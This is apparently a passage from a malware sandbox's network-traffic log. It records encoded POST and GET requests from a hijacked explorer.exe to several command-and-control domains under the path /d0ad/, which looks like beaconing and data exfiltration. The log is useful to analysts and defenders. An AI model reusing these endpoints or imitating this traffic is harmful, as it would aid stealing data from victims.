Oct 26, 2022 13:19:52.197643995 CEST	1651	OUT	Data Raw: 49 54 4b 35 5a 49 39 70 51 28 65 76 30 58 48 64 65 77 6d 51 4d 59 75 38 46 54 68 46 4b 34 41 37 2d 28 56 61 68 63 54 4f 6a 4b 64 38 67 5a 79 33 67 41 6f 45 48 47 4e 54 74 31 43 6e 69 75 45 6a 48 48 5f 56 5a 70 36 50 37 66 63 6d 64 6a 76 38 63 30 Data Ascii: ITK5ZI9pQ(ev0XHdewmQMYu8FThFK4A7-(VahcTOjKd8gZy3gAoEHGNTt1CniuEjHH_VZp6P7fcmdjv8c0ArSNCWPvPxRdWyb5uNEQuubn3Ri1tl7dBFeepk3jaiIWMeGzPgF~ED4dZNePqLDXzZ0H32RXaVh03Hva9tiLKzLymyI0A~Sg5LR37p90JoxhIaxsRAcFK(JQBKaWqE5~dbN1pE36B8oZ5TLnhNO~yP2K71wv9(9h0
Oct 26, 2022 13:19:52.349772930 CEST	1654	OUT	Data Raw: 63 61 35 4e 34 34 56 53 4f 6e 57 33 43 54 63 4d 35 63 5a 4e 48 46 6f 6f 31 57 52 45 45 39 47 33 58 31 37 4d 34 78 52 4e 77 45 64 31 6b 56 79 58 4b 33 66 46 6a 41 57 4a 68 35 46 63 42 46 65 72 41 30 53 56 46 55 53 61 57 58 2d 31 4b 70 31 78 57 44 Data Ascii: ca5N44VSOnW3CTcM5cZNHFoo1WREE9G3X17M4xRNwEd1kVyXK3fFjAWJh5FcBFerA0SVFUSaWX-1Kp1xWDYTjCGkkaC04sXQ9PvLQ(LxmOQz9akEOrabCfljCBUOqgyuMoTyGOMSaOydngJrVRWxAw9r657uFLLWwPYsVt_7N4Uw58V7jiHqF6reF7yIKYcz38hY5hptJGU4MSn6unZ~sha59f4VRQCgxMf5Tsbmep7LCrFfar4
Oct 26, 2022 13:19:52.349951982 CEST	1661	OUT	Data Raw: 79 56 31 37 37 65 37 7e 77 6b 6f 35 6e 6e 74 4d 66 43 6e 30 57 56 64 5a 32 44 68 71 44 6c 41 7a 52 36 61 30 4b 5a 6f 6c 58 51 54 37 47 71 4a 69 6d 41 64 68 52 69 47 59 42 4d 6f 4a 6e 6a 4c 31 34 7e 73 69 56 6d 68 69 52 66 6c 56 41 6c 54 28 34 7a Data Ascii: yV177e7~wko5nntMfCn0WVdZ2DhqDlAzR6a0KZolXQT7GqJimAdhRiGYBMoJnjL14~siVmhiRflVAlT(4z1SA4N~5MA7rlcq0hxAnTLcfsuZyEonYnUIAeyxesZqjcgCD1CE9NBXIJG3ukdEN6MGQabFUXUkLo5jcbs4audBcVr2EOC2owIy6oXFXutb3RTHQr_Q4IPoti8PaEu4vsmLBN6t3Gavj9fmcW6SLmaTIrpnldVYRaV
Oct 26, 2022 13:19:52.350116968 CEST	1663	OUT	Data Raw: 77 7a 57 4f 76 72 32 7a 61 6e 2d 4e 4a 79 54 4b 4f 4c 56 6a 54 4d 4a 7a 63 78 30 4d 47 54 5f 5a 61 59 4b 67 74 67 39 67 49 50 57 59 47 73 55 6d 31 35 43 4c 72 56 5a 74 36 65 73 6c 62 6e 67 42 4f 57 44 31 53 62 56 5a 47 5a 6e 57 75 7a 6c 65 75 33 Data Ascii: wzWOvr2zan-NJyTKOLVjTMJzcx0MGT_ZaYKgtg9gIPWYGsUm15CLrVZt6eslbngBOWD1SbVZGZnWuzleu3xN6Qir4I6Yy5vy7qQ~OG-Ls2lPKLtDxxP(GScNvd_zHIAVxWKDbvTlU4nCBck91(HSuiZCdJpOvwYPAp5NTaKZ_7E~Lgp2pl4NRtFeCf8QlsouxWz1rpWVe8hCTdhnUKSF9LmlPUBKx~lnWK6O1(hu1BJWWoJ3RCf
Oct 26, 2022 13:19:52.505446911 CEST	1666	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:52 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.11.20	49922	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:54.214807987 CEST	1666	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w== HTTP/1.1 Host: www.sbgfoundation.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:19:54.384260893 CEST	1667	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:19:54 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.11.20	49923	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:59.573220015 CEST	1668	OUT	POST /d0ad/ HTTP/1.1 Host: www.budgaugh.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.budgaugh.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.budgaugh.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4a 51 63 62 7e 54 7e 44 59 4b 7a 34 7e 79 5a 44 74 43 46 47 71 73 61 46 43 53 6e 79 33 48 38 72 75 74 45 67 42 48 4a 30 78 6d 78 57 50 45 79 47 28 77 5a 34 42 35 48 69 46 44 59 76 37 64 62 62 76 33 53 38 57 55 59 77 79 4e 4c 46 56 4a 50 4c 78 41 46 65 31 76 77 79 5a 48 4d 33 43 77 68 70 28 6f 52 57 36 73 35 6c 31 56 7e 68 7e 38 61 50 6c 61 6b 71 4a 53 48 77 51 47 79 2d 6a 45 32 6d 36 62 43 58 53 77 4e 6d 79 55 36 59 68 33 79 4a 34 62 49 6c 51 56 55 53 6b 49 64 7a 31 77 74 47 46 48 48 54 35 75 67 4e 6c 51 70 69 49 36 46 5a 42 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=JQcb~T~DYKz4~yZDtCFGqsaFCSny3H8rutEgBHJ0xmxWPEyG(wZ4B5HiFDYv7dbbv3S8WUYwyNLFVJPLxAFe1vwyZHM3Cwhp(oRW6s5l1V~h~8aPlakqJSHwQGy-jE2m6bCXSwNmyU6Yh3yJ4bIlQVUSkIdz1wtGFHHT5ugNlQpiI6FZBQ).
Oct 26, 2022 13:19:59.772875071 CEST	1668	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Oct 2022 11:19:59 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d b3 55 d2 57 b2 b6 d1 87 4a 01 00 37 30 80 5f 23 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 32)N.,(ON,(JMUWJ70_#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49852	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:54.589155912 CEST	403	OUT	POST /d0ad/ HTTP/1.1 Host: www.creotopi.biz Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.creotopi.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.creotopi.biz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 31 5f 41 46 77 31 62 33 70 32 4c 69 53 71 62 79 4e 4e 77 67 4d 37 62 4e 70 44 6e 38 37 58 77 4e 44 74 4c 61 75 5a 55 66 30 66 43 57 36 4d 4e 45 35 51 34 5a 39 43 45 50 53 5a 76 6d 78 4c 37 38 7a 55 31 59 53 4a 71 63 75 57 56 4c 4f 36 79 54 63 6f 58 52 50 79 4e 70 4a 61 56 61 64 43 72 79 76 41 42 4d 6e 44 4f 6a 4e 53 32 38 65 6e 49 4d 43 46 76 34 71 53 44 37 5a 63 79 5a 6a 5f 42 44 33 54 79 6f 66 56 39 38 64 70 65 79 34 57 4b 64 73 32 66 6b 57 55 6d 57 58 2d 44 47 59 67 43 74 38 4d 5a 5f 6a 44 59 5f 6f 34 68 78 41 68 57 58 75 47 37 4a 28 70 61 61 4c 32 34 43 6b 2d 43 2d 76 4b 65 45 41 69 77 36 63 78 41 5f 58 69 5a 45 50 64 4d 42 38 30 45 56 30 48 6e 53 56 44 35 66 57 52 5a 56 5a 33 42 57 68 4b 64 36 46 35 69 46 51 68 4e 32 79 72 70 45 4e 43 75 74 79 45 7e 69 6c 4a 50 32 67 46 58 7a 46 6a 51 57 30 58 41 6e 70 2d 38 67 6d 70 58 70 34 72 52 4f 72 47 6d 30 36 45 66 5f 79 6f 4f 4b 37 73 31 4f 41 46 72 37 4b 73 6d 37 7a 47 28 74 59 79 65 30 4a 42 71 48 48 37 6c 34 77 55 76 64 73 43 56 4f 65 58 47 6d 58 34 4d 36 46 45 54 36 49 68 77 41 71 79 6d 53 42 59 75 32 38 4d 36 6a 55 48 79 77 73 53 65 62 4f 35 75 54 78 7a 4c 34 74 72 6d 47 79 42 33 62 57 50 76 4a 7e 53 49 5f 62 48 7a 5a 65 57 6a 6a 52 51 61 51 73 78 62 6d 6a 37 68 46 45 73 36 45 63 33 54 70 36 54 35 72 6d 53 4a 2d 68 62 39 77 5a 61 38 51 52 70 4f 72 5a 58 51 44 5a 63 6a 6c 4e 36 4a 45 73 4c 76 75 62 51 65 71 5a 43 61 34 42 54 5a 44 7e 34 4a 69 32 4b 79 69 72 38 53 54 31 48 79 33 4b 43 36 51 4b 6c 6f 72 7a 43 32 61 4b 7a 75 59 41 55 77 32 78 72 68 5a 57 79 67 45 70 64 61 49 58 70 58 41 58 66 65 49 71 53 77 6f 51 38 76 76 36 59 6c 6f 66 76 64 32 67 64 38 31 68 6a 45 78 49 34 42 4d 61 36 53 62 59 43 52 72 59 2d 76 4b 46 59 45 34 61 56 30 5f 50 75 43 48 78 66 33 59 68 4d 77 48 30 70 46 79 39 51 4a 6b 67 50 7e 6d 47 52 37 35 46 71 42 4b 4f 37 59 49 75 51 62 45 67 4d 53 41 70 36 73 45 7e 54 30 66 61 61 75 2d 64 74 53 66 31 51 45 4d 6d 47 36 54 33 45 49 54 4c 50 58 33 6c 31 43 4a 41 44 35 56 48 59 75 31 53 79 47 34 36 62 56 6b 45 34 76 42 48 37 50 77 74 77 4d 75 42 76 51 58 69 45 50 42 57 2d 66 30 47 55 61 49 69 6b 43 32 4a 6f 48 46 39 36 48 55 74 52 47 52 58 73 38 4e 57 52 30 4b 38 76 45 5a 77 74 4f 30 46 73 5a 58 33 31 33 61 63 79 73 33 61 45 59 6a 43 61 64 34 34 72 38 6c 71 67 45 67 4c 76 71 56 74 4f 66 62 45 75 4a 7a 55 53 6f 65 6a 51 39 74 7a 4c 58 4b 7e 69 75 49 31 6a 65 47 4b 72 71 77 4b 4a 5a 77 37 57 6f 7a 74 65 78 45 79 41 70 68 38 66 41 33 66 6f 28 4e 34 5f 39 52 31 52 58 42 4c 59 50 32 37 71 61 51 4f 4e 70 7a 32 43 56 66 74 32 56 78 75 68 4e 65 48 36 79 6a 59 63 31 42 6c 69 46 51 50 73 34 31 38 43 52 6c 51 58 46 57 6d 77 69 6c 4a 49 71 52 61 42 32 4e 4d 67 6b 58 51 69 4a 4a 74 6a 45 2d 43 48 4f 71 70 6e 36 35 53 64 52 4d 45 43 6e 43 41 6c 67 59 68 77 52 51 66 79 49 58 4a 57 66 4b 55 41 73 56 34 54 79 4c 6c 4d 6f 5f 44 39 7a 2d 6d 77 67 6d 4c 4f 77 66 64 41 46 77 34 42 6a 53 77 4b 68 54 71 66 44 79 41 2d 78 64 47 4c 6d 4a 51 7a 44 62 69 64 69 66 39 6a 74 6b 57 44 59 33 4e 5f 62 4e 4e 6e 47 31 71 51 38 6f 6b 72 7a 31 42 71 56 69 43 74 45 54 41 71 4c 56 46 70 55 56 72 4b 66 46 6b 41 7e 35 28 30 4d 43 46 74 51 45 55 51 37 79 53 55 4d 42 54 43 38 71 63 42 4e 61 66 32 7a 53 5a 58 47 43 6d 78 53 66 33 2d 62 33 6a 64 79 43 72 65 7e 5a 36 46 7a 72 49 4a 57 49 4d 6e 58 4c 42 4d 68 54 59 56 43 2d 52 7a 66 4e 43 2d 59 37 61 31 6a 6b 4a 71 31 37 50 53 4e 69 6d 33 35 76 6c 4b 71 65 50 65 66 52 70 5a 37 4e 33 51 48 49 57 37 42 45 4e 32 76 44 6e 62 43 67 49 64 42 4b 58 79 49 67 56 67 43 79 65 69 7a 4f 6e 5a 48 75 48 4c 5a 34 56 4a 54 46 55 6c 77 6f 73 76 42 42 41 64 32 50 44 33 54 70 30 4c 52 78 6d 59 41 52 4b 41 65 58 51 52 72 61 59 7a 69 69 4e 64 34 47 78 6e 32 41 33 61 65 62 55 75 4d 2d 6b 6b 77 35 65 41 36 32 4e 68 68 41 68 42 41 64 6c 4c 68 34 4a 74 58 75 67 4d 38 31 75 74 31 44 4b 4f 55 74 35 45 4f 73 4c 76 43 53 78 7a 6b 31 56 32 4f 44 31 44 30 4c 75 4d 48 74 6c 5a 66 62 41 72 68 46 6a 4c 7a 58 70 45 78 43 5a 59 51 72 58 68 36 67 66 6a 59 72 4e 42 65 66 43 51 64 45 59 79 57 51 46 70 4c 54 71 41 5a 6d 46 46 66 6c 31 7a 4d 55 49 77 56 54 49 68 63 6e 70 58 69 Data Ascii: jXu=1_AFw1b3p2LiSqbyNNwgM7bNpDn87XwNDtLauZUf0fCW6MNE5Q4Z9CEPSZvmxL78zU1YSJqcuWVLO6yTcoXRPyNpJaVadCryvABMnDOjNS28enIMCFv4qSD7ZcyZj_BD3TyofV98dpey4WKds2fkWUmWX-DGYgCt8MZ_jDY_o4hxAhWXuG7J(paaL24Ck-C-vKeEAiw6cxA_XiZEPdMB80EV0HnSVD5fWRZVZ3BWhKd6F5iFQhN2yrpENCutyE~ilJP2gFXzFjQW0XAnp-8gmpXp4rROrGm06Ef_yoOK7s1OAFr7Ksm7zG(tYye0JBqHH7l4wUvdsCVOeXGmX4M6FET6IhwAqymSBYu28M6jUHywsSebO5uTxzL4trmGyB3bWPvJ~SI_bHzZeWjjRQaQsxbmj7hFEs6Ec3Tp6T5rmSJ-hb9wZa8QRpOrZXQDZcjlN6JEsLvubQeqZCa4BTZD~4Ji2Kyir8ST1Hy3KC6QKlorzC2aKzuYAUw2xrhZWygEpdaIXpXAXfeIqSwoQ8vv6Ylofvd2gd81hjExI4BMa6SbYCRrY-vKFYE4aV0_PuCHxf3YhMwH0pFy9QJkgP~mGR75FqBKO7YIuQbEgMSAp6sE~T0faau-dtSf1QEMmG6T3EITLPX3l1CJAD5VHYu1SyG46bVkE4vBH7PwtwMuBvQXiEPBW-f0GUaIikC2JoHF96HUtRGRXs8NWR0K8vEZwtO0FsZX313acys3aEYjCad44r8lqgEgLvqVtOfbEuJzUSoejQ9tzLXK~iuI1jeGKrqwKJZw7WoztexEyAph8fA3fo(N4_9R1RXBLYP27qaQONpz2CVft2VxuhNeH6yjYc1BliFQPs418CRlQXFWmwilJIqRaB2NMgkXQiJJtjE-CHOqpn65SdRMECnCAlgYhwRQfyIXJWfKUAsV4TyLlMo_D9z-mwgmLOwfdAFw4BjSwKhTqfDyA-xdGLmJQzDbidif9jtkWDY3N_bNNnG1qQ8okrz1BqViCtETAqLVFpUVrKfFkA~5(0MCFtQEUQ7ySUMBTC8qcBNaf2zSZXGCmxSf3-b3jdyCre~Z6FzrIJWIMnXLBMhTYVC-RzfNC-Y7a1jkJq17PSNim35vlKqePefRpZ7N3QHIW7BEN2vDnbCgIdBKXyIgVgCyeizOnZHuHLZ4VJTFUlwosvBBAd2PD3Tp0LRxmYARKAeXQRraYziiNd4Gxn2A3aebUuM-kkw5eA62NhhAhBAdlLh4JtXugM81ut1DKOUt5EOsLvCSxzk1V2OD1D0LuMHtlZfbArhFjLzXpExCZYQrXh6gfjYrNBefCQdEYyWQFpLTqAZmFFfl1zMUIwVTIhcnpXijFTizjEuM(le2w_G5jCAzQWgrsS8-61nNO_YxIqvLsnV5BJx9mN47XjTPHnVScWeZ4OiI8JETt3koPHR5GMEPCZLNNmENXR351iJcg_s8(SJZfvvtBs~5BrRgJ-K8P6ZF(EkjA5k9aztaXfnpcsAILsqwxOMn40Oir-uIy1He02QVmKPeVIhW1j9A81iOKr0SVi4HPM3lBtbg04jXkPfodJJjQlaIBlVFR1526vHul2i2fMuIwv00hqp4hCA0Ln1TMBMrDfNbSKRHFj5kurxVRPvvgDuzny3KFQC2fnODWsAhFGf-Rqve01tcydLyIRycKD0TO2wtHnTci1OleQ0DDQ9q4KuiehJ7KOn2AA(tLxZxdbgxq0~WjUwXYnhKoK9ub58k2O6DhHnhKRf9TyphCk(EnsYLDDntHa5P9v4qEA7Nq7jBSZH0eNXnjH4WRIdQd_08Ohxcj_YX2WiVxMStMoIQYdv6v-zm(eaX9G7mf_IhkmOiPFg-6245Mqajwvt3aMKp4KUEEQT10viJGhN1F6Pme-ZV8vP0YKv5(ISwL-1uescJHKHElz5niiddTI1_XKVhOF8qtF3xWLhZIKczHyCiLF9v1VQv23FwhBKhKYP8iYsBjPCo6NWYhfQa7exdHjF4EoCd~tmC3PYowDKq(RskEhKvPNqeZ61kyBxCIseK3jTaAQfWMqIjhnLV9OMVcHNHbjU3K-CCDuJY6i3IBQp3xwQdhgGtuZNmm0HSrkg6rkaU7-5ROkYpOPqYQY(-GCShMcAJOBdMCPEKRZpxxH8E49hDV9GcYwFY2PnderDTPj0-iGcZlQ0VWxljnP42aB(9UrqanM1td_jei3H7efZ3tTOKLIAh01IQ2dhDAKL7ePnJKrGw9OePbP7ldZfdmuzjwtfJsPuj0EEAjkMhc2fkJERA8BU9vbIpgplHLz2M3bcR(Ee4ISWZecxIkaP2VbxZE6~tGJhN733zYdT4jv3puEuDabonQd3GjtAk8YHjXpYD~r3aVscVbEj8Gg3xI0iMN3lyCuuQkoZvkHE6LBE-5K~XTk2apaeumo87oBQAOlrcTVgbcZI30pC4SJjh8FvdGqD2PATZehWQrx~Q(sDq6v(YmDO7KhZUbGRfZV2vnpSXi3sj1eD9JDDJQkruZ4kLp3MhbT4F(dPBJcAOa2J9Yee8c39kzBloGPmvN5h2dJRnEJE7nGD0uf3jQa7XppmRozqGA51p5o0pTiY9osrAqPuATYKxLgNaPY4nTo(OPGg8MlG1XvVfpCVfkOy4YzLOQ8ObKnWBsHQHUmnOx6HKUBv49VXqERFqCeFThSuumQiTCVkYmQsWKoXahQxiZfpq0TiffaEDGRZRgRqSUbG2q6nsbKiwEvOMpOretijkv4lvckbRBiE00CeBHWpoEJQVjYUtT1a2ZNbTjTm4W7h8xjG6CnJ8sazq28lJ(QGJPoXwMFlE1dWmF3jqWFy8vQEEbunOXADDk6zolR9OrL0GZP4jNtNHzM60But3(rLNS-3LMdZ5hS~Vg-cwqH6R7Wq6R9hXNeluHrnj6xWyjb3P9dVygpS66gRTStBB32FREMCzZW1AX3xDKqzKiObLWb2zzFJSnSEK5aKF2mmaT8ydx6O-Gtxqn4NkJp1wrIRRfq52tZHJ9spQmvuF0vtuYpHMeOtRmOpTUWNkM_MNpzagvEijQp851VS5H8x0y-Sy6-F6Ru~aXLG_7QyHRTN95zlky3YjQFbEHT8fIYicwmzDQfkoyCZjQbPVQc7a1KUv6yEqsgNp22dbrV9XnO29j7hTpGD2odwqWunl8oldhfR1eIfe(36r9mcFZeAlhArB0s5DeiYoXvM9y3p6SXdWKkgkxFuH80~dlCt8Tok0V6im088x6shfUn3zUdjJnsxLB1fDJjWJ(XihAh3YJoQbQK2UA_28614D4htP~vRefuenLFo0dniiDiHV(CGFYKEEnY4weopuPwqFVaxyOK86sBX9YyEhiiOBjcfS6D~nsg1daKxcZh6BH-BGFg2X1fh9i4UnBbmfkp61JFc90Pol9VUBD_x0nCylpb67hqQy~YIGAdqcBRrVmgUIBbkYIv9fLwGyI4xRIb8clo6DfdM9NEA0Ai6c9jx8mUDfYp5Z(1Ep~VrAcFLfK6ZQQkBz2YyU8TlD(_Q626uIRMDWGaiO4TgWNX9XD_JYBGdo93XmJAo7zfOh0SCAi1XR(VRKthXxNHL1S3SR6YEozfAsjVR53z4IF_dh4K(quEQ1cFjN2X5oJuwyEeB6lL5gF7CoTTVNjIfl9cUDgONshBZYKUOpNcMIKXszXNUQty2QD_vrNe3QEySyIcWBgCV-L2DQdyeZ8oHRRr5zwGhspK4WacV9ZUOhTRf1qV(ik03d(09FGlTv5o0P4mcPEZbwWrnr04YINP7kVnrG2ew8RGLZLyR4Y9Nei30sycwqLXLGwCYBP_Q25H6gdpnsdczE16hWLVeuO93USCeWOPE19HwiyRqqVJGhnwnG~nSucbV1OLuJQf9-rcBu85T9ibIznMBycSuhzac11s2pCr(GlYFgOgCXoIghUiVtBLW_0pndhqGNcbp5uzvBpmdapuY2S1mIoaZfA5rQ4Ivouy(u0H9xWuxF(TMkWkgFfb04HncuUoHfhrY0pvc67SN14ov50FOlX9PkX6akOMYLsH3ekPTrIHc54R4xtiQMyeriOHG8qQEiSkExClw9Z4oEbL
Oct 26, 2022 13:15:54.782470942 CEST	406	OUT	Data Raw: 38 73 68 30 73 36 63 76 38 70 50 76 72 50 61 79 58 36 45 4b 36 52 6d 53 39 48 5a 67 59 62 50 43 72 6c 38 41 57 67 33 4f 46 55 55 5f 51 77 62 71 77 73 35 4f 37 67 4c 76 47 73 71 50 4d 44 57 37 4c 43 65 46 31 42 32 65 38 5f 41 79 47 69 44 2d 4f 50 Data Ascii: 8sh0s6cv8pPvrPayX6EK6RmS9HZgYbPCrl8AWg3OFUU_Qwbqws5O7gLvGsqPMDW7LCeF1B2e8_AyGiD-OPSk9utFL-cMloISPc6BZ5Ukyxxe7LUIUkbkpK0t6EHKBPmtqQERLZbVqZFg0NcpUD7Re3NllwMb5V3Xj-f4XGcdM_sYDbQK9JM8~4Rt6iT7vB2-bNgSKvkpoFR194A9ohtWpGuPhYbWAnwy7psGB6akL4DKFnDkpor
Oct 26, 2022 13:15:54.782668114 CEST	426	OUT	Data Raw: 7e 52 64 34 36 38 71 67 48 78 67 4a 70 31 4a 71 70 71 44 33 34 51 52 6a 37 76 62 7a 59 71 61 52 64 4e 4d 74 6e 37 46 74 30 57 59 6c 48 43 57 34 47 76 59 71 72 79 46 7a 42 53 41 36 74 73 57 57 33 5f 34 39 30 64 64 32 43 6a 34 61 47 30 4b 6a 71 51 Data Ascii: ~Rd468qgHxgJp1JqpqD34QRj7vbzYqaRdNMtn7Ft0WYlHCW4GvYqryFzBSA6tsWW3_490dd2Cj4aG0KjqQnubCW0oougm7zwUP00e7QoAgRAONRWPp8v4KZ3FGePOPV_AfzCqHPSVHVCrqQPXWC3FfDsP2IJ(Caau5Pcujb7IJg6LLvgWnbGpSfOe9eCYshWehVl(tgZM1sfP4e3rf9vHJFKJPNF4baQxUlI21A89nQSyDtsLXn
Oct 26, 2022 13:15:54.782807112 CEST	428	OUT	Data Raw: 53 6d 70 64 6f 51 66 53 35 51 61 4a 74 63 34 35 48 5a 48 30 6e 75 65 6a 76 45 33 37 36 4e 67 4a 52 71 28 45 36 34 49 6c 55 5a 4a 49 39 75 72 77 46 76 36 79 48 59 53 78 4d 38 34 6a 49 5f 6c 79 78 71 4a 5a 38 48 72 48 78 56 28 33 75 55 61 75 48 7a Data Ascii: SmpdoQfS5QaJtc45HZH0nuejvE376NgJRq(E64IlUZJI9urwFv6yHYSxM84jI_lyxqJZ8HrHxV(3uUauHzH5PHLqG_HWhYDtFsEDRNI7TftzKllAzur2ub4ANAEjD225TwMbHBCPkK32W5u4VGgg47pY7_Z53mcORJn3vOb9WUpLZnir9QFbqsJ_RS5qXWeFWMQ7Tr8hyi0xgjl2SvXkOHxD7BsGvAKgsBGrzPGK6MDwuMe2X8n
Oct 26, 2022 13:15:54.974924088 CEST	431	OUT	Data Raw: 66 30 6f 49 43 69 67 46 44 4f 59 74 35 47 55 54 43 62 56 73 68 6d 51 77 7a 30 6a 4a 57 66 31 76 57 69 72 66 58 51 62 36 67 5f 58 76 35 59 42 32 79 45 7e 33 35 54 33 45 77 58 70 45 66 63 4e 6d 6d 43 63 6f 78 4d 41 7a 76 31 37 42 44 48 5a 32 43 4a Data Ascii: f0oICigFDOYt5GUTCbVshmQwz0jJWf1vWirfXQb6g_Xv5YB2yE~35T3EwXpEfcNmmCcoxMAzv17BDHZ2CJA7lSvCpYdw3AbAwQFPKxxkTU7SuMU9WPUL4fOmfGx2A0KEjQg0HsVh7t~Z8BRo~ngqejDidA0Vb0mbTJ5iHI7_3erSTB69U19yclSm~Q7Ncyk9iicPUcWFXcF58_Hnzwjlj3uUNtXcUuBLnav_JGqohlkkplW6pR6
Oct 26, 2022 13:15:54.975095034 CEST	434	OUT	Data Raw: 38 67 49 33 42 37 57 63 51 4d 46 56 4c 69 53 72 47 58 6d 4e 4f 79 76 56 6c 74 74 32 6e 55 38 51 62 33 79 58 69 79 39 4e 31 38 6e 42 66 78 57 4d 71 39 34 6d 4c 6c 41 47 49 58 48 37 49 4b 74 67 35 59 55 69 63 59 4b 36 42 56 72 4b 38 66 66 75 6a 33 Data Ascii: 8gI3B7WcQMFVLiSrGXmNOyvVltt2nU8Qb3yXiy9N18nBfxWMq94mLlAGIXH7IKtg5YUicYK6BVrK8ffuj3T7mPpfclcP8fD442Op7ubQ2b0kaFKTNm0RaYCJD_bo(XVLRhJLZWHGgR6GO0YwmaFu(i83jrlnu2gUs0Aise(Oq06z62FX4xCVDguBfPEw7BNHwcgJODjR23bzhgq0AAY_6sVHXq0qUoCBNGRD7I59tbN6vcrVpcW
